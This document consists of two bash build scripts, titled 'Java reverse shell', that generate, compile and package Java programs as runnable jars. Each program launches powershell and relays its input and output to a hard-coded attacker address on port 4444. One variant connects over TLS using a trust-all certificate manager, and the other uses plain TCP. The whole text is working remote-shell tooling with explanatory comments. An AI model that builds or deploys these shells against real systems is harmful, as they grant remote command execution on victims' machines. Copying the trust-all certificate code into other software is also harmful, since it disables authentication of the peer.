Java reverse shell
#!/bin/bash
# This is not great...
#
# Build script: writes two Java sources into a scratch directory, compiles
# them, packages the classes into an executable jar and moves that jar back
# into the directory the script was started from. All connection parameters
# are baked into the generated source as literals at build time.
#
# Name of the generated main class (also used as the Main-Class manifest entry).
NAME=Shell
# Name of the generated X509TrustManager whose check methods accept anything.
TAC=TrustAllCertificates
# Peer address and port, pasted into the Java source as a string and an int literal.
LHOST=10.0.0.254
LPORT=4444
# The embedded double quotes are deliberate: this value is dropped into a Java
# array initializer below, so it has to read as a Java string literal there.
COMMAND='"powershell"'
# Start directory, so the finished jar can be moved back here at the end.
CURDIR=$(pwd)
# Scratch directory for sources, class files and manifest; deleted at the end.
BUILDDIR=$(mktemp -d)
cd "${BUILDDIR}"
# Generate the trust manager source. The heredoc is unquoted, so ${TAC} is
# expanded by bash; everything else is written verbatim into ${TAC}.java.
cat > "${TAC}.java" << EOF
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import javax.net.ssl.X509TrustManager;
/**
 * X509TrustManager with empty check methods: any peer certificate
 * (self-signed, expired, wrong host name) is accepted, so TLS built on
 * this manager encrypts the connection but does not authenticate the
 * peer. This "trust-all" shape is what static analysers flag, and the
 * CertificateException import above is unused because neither check
 * method ever throws it.
 */
public class ${TAC} implements X509TrustManager {
// Never throws: every client certificate chain is accepted.
public void checkClientTrusted(X509Certificate[] certs, String authType) {
}
// Never throws: every server certificate chain is accepted.
public void checkServerTrusted(X509Certificate[] certs, String authType) {
}
// Returns null rather than an empty array; a caller that iterates the
// result would hit a NullPointerException.
public X509Certificate[] getAcceptedIssuers() {
return null;
}
}
EOF
# Generate the main class source. Unquoted heredoc: ${NAME}, ${LHOST},
# ${LPORT}, ${COMMAND} and ${TAC} are expanded by bash. The backslash in
# the "\n" literal further down survives because inside a heredoc bash only
# treats a backslash specially before a dollar sign, backtick, backslash or
# newline.
cat > "${NAME}.java" << EOF
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
import javax.net.ssl.*;
import java.io.InputStreamReader;
import java.io.BufferedReader;
/**
 * Starts the configured command as a child process and relays its output
 * to a TLS socket, and lines read from that socket to the child's stdin,
 * until the child exits or the socket is closed. Host, port, command and
 * trust manager class are fixed when the source is generated.
 */
public class ${NAME} {
public static void main(String[] args) throws Exception {
String host = "${LHOST}";
int port = ${LPORT};
// One-element array holding the quoted COMMAND value.
String[] cmd = {${COMMAND}};
// stderr is merged into stdout, so the error stream read as pe below
// never carries data.
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
// The context is initialised with the trust-all manager only: the
// connection is encrypted but the peer certificate is never validated.
SSLContext sslContext = SSLContext.getInstance("TLS");
sslContext.init(null, new TrustManager[] {new ${TAC}()}, new java.security.SecureRandom());
SSLSocketFactory sslSocketFactory = sslContext.getSocketFactory();
SSLSocket s = (SSLSocket) sslSocketFactory.createSocket(host, port);
s.startHandshake();
// si is obtained but not used; socket input is read through bsi instead.
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
// Line-oriented reader over the socket. readLine() blocks, so each pass of
// the loop below waits for a complete line or for the peer to close.
BufferedReader bsi = new BufferedReader(new InputStreamReader(s.getInputStream()));
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while(!s.isClosed()) {
// Drain whatever the child has written so far, one byte per write() call.
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
// https://stackoverflow.com/questions/26320624/how-to-tell-if-java-sslsocket-has-data-available
// available() is not a reliable signal on an SSLSocket, which is why the
// byte loop is disabled and the blocking readLine() below is used instead.
// while(si.available()>0)
// po.write(si.read());
String line = bsi.readLine();
if (line != null) {
// getBytes() without a Charset uses the platform default encoding.
po.write((line + "\n").getBytes());
}
else {
// Peer closed the connection. Closing the reader presumably closes the
// underlying socket stream as well, which would make isClosed() true
// on the next loop check; verify against the SSLSocket implementation.
bsi.close();
}
so.flush();
po.flush();
Thread.sleep(50);
// exitValue() throws IllegalThreadStateException while the child is
// still running; the catch-all swallows that and the loop continues.
// Only a child that has exited reaches the break.
try {
p.exitValue();
break;
}
catch (Exception e){
}
};
p.destroy();
s.close();
}
}
EOF
# Print the generated sources so the expanded values can be inspected.
cat "${TAC}.java"
cat "${NAME}.java"
# Manifest with a Main-Class entry so the jar is runnable with 'java -jar'.
mkdir META-INF
echo "Main-Class: ${NAME}" > META-INF/MANIFEST.MF
# --release is a javac 9+ option; the emitted class files target Java 7.
javac --release 7 -d . *.java
# Both generated classes are packed; the glob picks up any .class file in the scratch dir.
jar cmvf META-INF/MANIFEST.MF shell.jar *.class
# Output artefact: shell_<unix-epoch-seconds>.jar in the start directory.
# CURDIR is unquoted on these two lines, so a start path containing
# whitespace would be split.
mv shell.jar ${CURDIR}/shell_$(date '+%s').jar
cd ${CURDIR}
rm -rf "${BUILDDIR}"
#!/bin/bash
# Plain-TCP variant of the build script above: one generated class, no TLS,
# so everything relayed over the socket travels in cleartext.
#
# Name of the generated main class (also the Main-Class manifest entry).
NAME=Shell
# Peer address and port, pasted into the Java source as a string and an int literal.
LHOST=10.1.1.1
LPORT=4444
# Pasted into a Java string literal below (the quotes are in the Java source here).
COMMAND=powershell.exe
# Start directory, so the finished jar can be moved back here at the end.
CURDIR=$(pwd)
# Scratch directory for source, class file and manifest; deleted at the end.
BUILDDIR=$(mktemp -d)
cd "${BUILDDIR}"
# Generate the main class source. Unquoted heredoc: ${NAME}, ${LHOST},
# ${LPORT} and ${COMMAND} are expanded by bash; the rest is written verbatim.
cat > "${NAME}.java" << EOF
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
/**
 * Starts the configured command as a child process and relays its output
 * to a plain TCP socket, and bytes read from that socket to the child's
 * stdin, until the child exits or the socket is closed. Host, port and
 * command are fixed when the source is generated; nothing is encrypted.
 */
public class ${NAME} {
public static void main(String[] args) throws Exception {
String host = "${LHOST}";
int port = ${LPORT};
String cmd = "${COMMAND}";
// ProcessBuilder takes varargs, so the single String becomes argv[0].
// stderr is merged into stdout, so pe below never carries data.
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host,port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while(!s.isClosed()) {
// Copy pending bytes in each direction, one byte per write() call.
// available() is used as the readiness signal on all three streams.
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
// exitValue() throws IllegalThreadStateException while the child is
// still running; the catch-all swallows that and the loop continues.
try {
p.exitValue();
break;
}
catch (Exception e){
}
};
p.destroy();
s.close();
}
}
EOF
# Print the generated source so the expanded values can be inspected.
cat "${NAME}.java"
# Manifest with a Main-Class entry so the jar is runnable with 'java -jar'.
mkdir META-INF
echo "Main-Class: ${NAME}" > META-INF/MANIFEST.MF
# --release is a javac 9+ option; the emitted class file targets Java 7.
javac --release 7 -d . "${NAME}".java
jar cmvf META-INF/MANIFEST.MF shell.jar "${NAME}".class
# Output artefact: shell_<unix-epoch-seconds>.jar in the start directory.
# CURDIR is unquoted on these two lines, so a start path containing
# whitespace would be split.
mv shell.jar ${CURDIR}/shell_$(date '+%s').jar
cd ${CURDIR}
rm -rf "${BUILDDIR}"